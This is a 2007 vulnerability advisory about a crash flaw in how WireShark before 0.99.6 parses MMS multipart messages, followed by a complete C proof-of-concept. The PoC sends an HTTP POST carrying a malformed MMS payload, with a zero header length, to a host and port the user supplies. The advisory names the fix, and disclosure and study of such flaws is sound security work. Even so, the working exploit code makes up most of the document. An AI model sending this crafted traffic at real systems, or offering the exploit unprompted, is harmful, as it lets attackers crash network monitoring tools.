Title ===== WireShark MMS Remote Denial of Service vulnerability Date ==== 13 August 2007 Affected Software ================= WireShark < 0.99.6 Maybe all version of Ethereal Overview ======== MMS message parse flaw in WireShark implementation may allow a remote attacker to crash it causing denial of service. Vulnerability Description ===================== MMS means "Multimedia Messaging Service". When WireShark parsing a MMS message which Content-Type is application/vnd.wap.multipart.mixed, and the header len of a multipart content equels to 0x00, then it will be crash. Solution ======== Update to 0.99.6 PoC ================================ //main.cpp #include #include #pragma comment(lib, "ws2_32") char *http = "POST / HTTP/1.0\r\n" "Content-Type: application/vnd.wap.mms-message\r\n"; char *hoststr = "Host: %s:%d\r\n"; char *contentlenstr = "Content-Length: %d\r\n\r\n"; unsigned char mms[] = { 0x8c,0x80,//X-Mms-Message-Type: m-send-req(0x80) 0x98,0x7a,0x77,0x65,0x6c,0x6c,0x00,//X-Mms-Transaction-ID: zwell 0x8d,0x92,//X-Mms-MMS-Version: 1.2 0x97,0x31,0x33,0x35,0x31,0x30,0x30,0x30,0x30,0x30,0x30,0x30,0x00,//To: 13510000000 0x84,0xa3,//Content-Type: application/vnd.wap.multipart.mixed ////////////////////////////////////////////////// 0x01,//multipart,count 0x0f,//HeadersLen 0x05,//DataLen 0x00,//headlen <<<=== If this is 0x00, then wireshark will be crash. The real value is the follow three lines bytes which is 0x0e /// 0x83,0x85,//Utf-8 0x7a,0x77,0x65,0x6c,0x6c,0x2e,0x74,0x78,0x74,0x00,//Name: zwell.txt 0x81,0xea,//Charset: utf-8 /// 0x7a,0x77,0x65,0x6c,0x6c,//zwell }; SOCKET connect_to_host(char *h, int p) { SOCKET sock; struct hostent *host; struct sockaddr_in saddr; if((host=gethostbyname(h))==NULL) { printf("resolv host %s error\n", h); exit(-1); } if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1) { printf("create socket error\n"); exit(-1); } memset((void *)&saddr, 0, sizeof(struct sockaddr_in)); saddr.sin_family=AF_INET; saddr.sin_addr.s_addr=*((unsigned long *)host->h_addr_list[0]); saddr.sin_port=htons(p); if(connect(sock, (struct sockaddr *)&saddr, sizeof(saddr))<0) { printf("connect to host %s on port %d error\n", h, p); exit(-1); } return sock; } void socket_init() { WSADATA wsaData; WSAStartup(MAKEWORD(2,0), &wsaData); } int main(int argc, char **argv) { SOCKET s; char sendbuf[1024]; int len = 0; printf("WireShark<0.99.6 MMS protocol DOS PoC\nCoded By ZwelL\nhttp://www.nosec.org\n"); if(argc != 3) { printf("usage : %s \n", argv[0]); exit(-1); } socket_init(); s = connect_to_host(argv[1], atoi(argv[2])); strcpy(&sendbuf[len], http); len += strlen(http); sprintf(&sendbuf[len], hoststr, argv[1], atoi(argv[2])); len = strlen(sendbuf); sprintf(&sendbuf[len], contentlenstr, sizeof(mms)); len = strlen(sendbuf); memcpy(&sendbuf[len], mms, sizeof(mms)); len += sizeof(mms); send(s, sendbuf, len, 0); printf("completed!\n"); return 0; }